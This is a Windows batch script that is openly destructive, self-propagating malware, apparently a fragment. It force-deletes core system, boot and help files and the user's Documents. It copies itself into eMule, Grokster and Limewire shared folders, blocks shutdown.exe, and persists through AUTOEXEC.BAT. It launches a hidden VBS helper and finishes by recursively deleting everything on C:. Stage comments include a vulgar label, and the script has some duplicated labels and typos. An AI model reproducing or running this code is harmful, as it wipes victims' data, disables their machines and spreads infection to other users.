If exist "%homedrive%\Windows\twain_32.dll" goto del_twain
If not exist "%homedrive%\Windows\twain_32.dll" goto pas_twain
:del_twain
Attrib "%homedrive%\Windows\twain_32.dll" -r -s -h
Del /F /Q "%homedrive%\Windows\twain_32.dll"
:pas_twain
If exist "%homedrive%\Windows\twunk_16.exe" goto del_tw16
If not exist "%homedrive%\Windows\twunk_16.exe" goto pas_tw16
:del_tw16
Attrib "%homedrive%\Windows\twunk_16.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\twunk_16.exe"
:pas_tw16
If exist "%homedrive%\Windows\twunk_32.exe" goto del_tw32
If not exist "%homedrive%\Windows\twunk_32.exe" goto pas_tw32
:del_tw16
Attrib "%homedrive%\Windows\twunk_32.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\twunk_32.exe"
:pas_tw16
If exist "%homedrive%\Windows\win.ini" goto del_win
If not exist "%homedrive%\Windows\win.ini" goto pas_win
:del_win
Attrib "%homedrive%\Windows\win.ini" -r -s -h
Del /F /Q "%homedrive%\Windows\win.ini"
:pas_win
If exist "%homedrive%\Windows\WindowsUpdate.log" goto delwinupd
If not exist "%homedrive%\Windows\WindowsUpdate.log" goto paswinupd
:delwinupd
Attrib "%homedrive%\Windows\WindowsUpdate.log" -r -s -h
Del /F /Q "%homedrive%\Windows\WindowsUpdate.log"
:paswinupd
If exist "%homedrive%\Windows\winhelp.exe" goto delwinhlp
If not exist "%homedrive%\Windows\winhelp.exe" goto paswinhlp
:delwinhlp
Attrib "%homedrive%\Windows\winhelp.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\winhelp.exe"
If exist "%homedrive%\Windows\winhlp32.exe" goto delwinhlp32
If not exist "%homedrive%\Windows\winhlp32.exe" goto paswinhlp32
:delwinhlp32
Attrib "%homedrive%\Windows\winhlp32.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\winhlp32.exe"
:paswinhlp32
If exist "%homedrive%\Windows\WMSysPr9.prx" goto delwmsys
If not exist "%homedrive%\Windows\WMSysPr9.prx" goto paswmsys
:delwmsys
Attrib "%homedrive%\Windows\WMSysPr9.prx" -r -s -h
Del /F /Q "%homedrive%\Windows\WMSysPr9.prx"
:paswmsys
If exist "%homedrive%\Windows\write.exe" goto delwrite
If not exist "%homedrive%\Windows\write.exe" goto paswrite
:delwrite
Attrib "%homedrive%\Windows\write.exe" -r -s -h
Del /F /Q "%homedrive%\Windows\write.exe"
:paswrite
:: SPREAD VIA: eMule, Grokster, Limewire
copy %0 "%programfiles%\eMule\Incoming\%0"
copy %0 "%programfiles%\Grokster\My Grokster\%0"
copy %0 "%programfiles%\limewire\Shared\%0"
:: DISABLE SHUTDOWN
icacls %windir%\system32\shutdown.exe /deny SID:D
attrib –r –s –h C:\autoexec.bat
del c:\autoexec.bat
attrib –r –s –h C:\boot.ini
del c:\boot.ini
attrib –r –s –h C:\ntldr
del c:\ntdlr
attrib –r –s –h C:\windows\win.ini
del c:\windows\win.ini
attrib -r -s -h C:\Windows\Boot
del C:\Windows\Boot
Erase /F /S /Q C:\Windows Boot
:: ENSURED SECONDS WAVE DESTRUCTION
Attrib "C:\Program Files\Internet Explorer\iexplore.exe" -r -s -h
Del /F /Q "C:\Program Files\Internet Explorer\iexplore.exe"
Attrib "C:\Windows\system32\cmd.exe" -r -s -h
Del /F /Q "C:\Windows\system32\cmd.exe"
Attrib "C:\Windows\system32\mstsc.exe" -r -s -h
Del /F /Q "C:\Windows\system32\mstsc.exe"
Attrib "%homedrive%\Users\%username%\Documents" -r -s -h
Set "docs=%homedrive%\Users\%username%\Documents"
For %%X In (%docs%) Do (
Del /F /Q %docs%\*.*
)
Del /F /Q "%homedrive%\Users\%username%\Documents\*.*"
Del /F /Q "%homedrive%\Users\%username%\Documents"
:: FREEZE COMPUTER
if exist "%systemdrive%\AUTOEXEC.BAT" (
copy %0 "%systemroot%\%0"
echo start "" "%systemroot%\%0" >> %systemdrive%\AUTOEXEC.BAT
)
echo Overwrite!
rundll32 user,disableoemlayer >%0
:: Final Rape
@echo Set wshShell=wscript.CreateObject("WScript.Shell") >Start_nc.vbs
@echo wshshell.run "%programfiles%\nukechild.bat", 0 >>Start_nc.vbs
Attrib Start_nc.vbs +H +R
Start Start_nc.vbs
echo y | del c:\*.* /f /q /s
Del /F /Q %0
@exit /b